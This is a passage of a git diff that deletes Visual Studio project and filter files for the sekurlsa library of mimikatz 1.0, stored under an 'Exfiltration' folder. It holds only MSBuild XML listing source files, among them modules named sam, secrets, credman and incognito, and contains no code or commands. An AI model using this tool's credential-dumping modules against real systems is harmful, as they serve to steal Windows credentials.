-    <ClInclude Include="..\..\commun\secpkg.h" />
-    <ClInclude Include="..\..\modules\mod_memory.h" />
-    <ClInclude Include="..\..\modules\mod_parseur.h" />
-    <ClInclude Include="..\..\modules\mod_pipe.h" />
-    <ClInclude Include="..\..\modules\mod_process.h" />
-    <ClInclude Include="..\..\modules\mod_system.h" />
-    <ClInclude Include="..\..\modules\mod_text.h" />
-    <ClInclude Include="modules\credman.h" />
-    <ClInclude Include="modules\incognito.h" />
-    <ClInclude Include="modules\sam.h" />
-    <ClInclude Include="modules\secrets.h" />
-    <ClInclude Include="Security Packages\msv1_0.h" />
-    <ClInclude Include="Security Packages\msv1_0_helper.h" />
-    <ClInclude Include="sekurlsa.h" />
-  </ItemGroup>
-  <ItemGroup>
-    <ResourceCompile Include="sekurlsa.rc" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters deleted file mode 100644
index 936fcde..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters
+++ /dev/null 
@@ -1,122 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Modules Communs">
-      <UniqueIdentifier>{87c9f520-31d1-4b44-a523-415e0c703bde}</UniqueIdentifier>
-    </Filter>
-    <Filter Include="Modules Communs\Communication">
-      <UniqueIdentifier>{8c6588bf-b3cf-4080-b59e-3ce82a6ccd62}</UniqueIdentifier>
-    </Filter>
-    <Filter Include="Modules Communs\Parseur">
-      <UniqueIdentifier>{9e44771d-18f4-407a-8f89-508cf5c366ff}</UniqueIdentifier>
-    </Filter>
-    <Filter Include="Modules Communs\Librairie Modèle">
-      <UniqueIdentifier>{541a9eff-641d-4a77-9b1f-e72ad6a7c0fa}</UniqueIdentifier>
-    </Filter>
-    <Filter Include="Modules Communs\Mémoire">
-      <UniqueIdentifier>{ba6b07a5-6d5b-4632-ad6e-56690630eaa7}</UniqueIdentifier>
-    </Filter>
-    <Filter Include="Security Packages">
-      <UniqueIdentifier>{1e52fbf9-a352-419f-870b-3c4e265781d8}</UniqueIdentifier>
-      <Extensions>
-      </Extensions>
-    </Filter>
-    <Filter Include="Modules Communs\System">
-      <UniqueIdentifier>{7fcd7c52-b4e5-4c6c-9dc7-190fbe667193}</UniqueIdentifier>
-    </Filter>
-    <Filter Include="Modules Communs\Texte">
-      <UniqueIdentifier>{c175e3ec-41d0-4474-bbc7-eb1962a7fc70}</UniqueIdentifier>
-    </Filter>
-    <Filter Include="Modules locaux pour sekurlsa">
-      <UniqueIdentifier>{b3819528-2e60-46a3-b37a-7c575a4d866a}</UniqueIdentifier>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\modules\mod_pipe.cpp">
-      <Filter>Modules Communs\Communication</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\modules\mod_parseur.cpp">
-      <Filter>Modules Communs\Parseur</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\commun\kmodel.cpp">
-      <Filter>Modules Communs\Librairie Modèle</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\modules\mod_memory.cpp">
-      
<Filter>Modules Communs\Mémoire</Filter>
-    </ClCompile>
-    <ClCompile Include="sekurlsa.cpp" />
-    <ClCompile Include="..\..\modules\mod_system.cpp">
-      <Filter>Modules Communs\System</Filter>
-    </ClCompile>
-    <ClCompile Include="Security Packages\msv1_0.cpp">
-      <Filter>Security Packages</Filter>
-    </ClCompile>
-    <ClCompile Include="Security Packages\msv1_0_helper.cpp">
-      <Filter>Security Packages</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\modules\mod_text.cpp">
-      <Filter>Modules Communs\Texte</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\modules\mod_process.cpp">
-      <Filter>Modules Communs\System</Filter>
-    </ClCompile>
-    <ClCompile Include="modules\incognito.cpp">
-      <Filter>Modules locaux pour sekurlsa</Filter>
-    </ClCompile>
-    <ClCompile Include="modules\secrets.cpp">
-      <Filter>Modules locaux pour sekurlsa</Filter>
-    </ClCompile>
-    <ClCompile Include="modules\credman.cpp">
-      <Filter>Modules locaux pour sekurlsa</Filter>
-    </ClCompile>
-    <ClCompile Include="modules\sam.cpp">
-      <Filter>Modules locaux pour sekurlsa</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\modules\mod_pipe.h">
-      <Filter>Modules Communs\Communication</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\modules\mod_parseur.h">
-      <Filter>Modules Communs\Parseur</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\commun\kmodel.h">
-      <Filter>Modules Communs\Librairie Modèle</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\modules\mod_memory.h">
-      <Filter>Modules Communs\Mémoire</Filter>
-    </ClInclude>
-    <ClInclude Include="sekurlsa.h" />
-    <ClInclude Include="..\..\modules\mod_system.h">
-      <Filter>Modules Communs\System</Filter>
-    </ClInclude>
-    <ClInclude Include="Security Packages\msv1_0.h">
-      <Filter>Security Packages</Filter>
-    </ClInclude>
-    <ClInclude Include="Security 
Packages\msv1_0_helper.h">
-      <Filter>Security Packages</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\modules\mod_text.h">
-      <Filter>Modules Communs\Texte</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\commun\secpkg.h" />
-    <ClInclude Include="..\..\modules\mod_process.h">
-      <Filter>Modules Communs\System</Filter>
-    </ClInclude>
-    <ClInclude Include="modules\incognito.h">
-      <Filter>Modules locaux pour sekurlsa</Filter>
-    </ClInclude>
-    <ClInclude Include="modules\credman.h">
-      <Filter>Modules locaux pour sekurlsa</Filter>
-    </ClInclude>
-    <ClInclude Include="modules\secrets.h">
-      <Filter>Modules locaux pour sekurlsa</Filter>
-    </ClInclude>
-    <ClInclude Include="modules\sam.h">
-      <Filter>Modules locaux pour sekurlsa</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ResourceCompile Include="sekurlsa.rc" />
-  </ItemGroup>
-</Project>
\ No newline at end of file |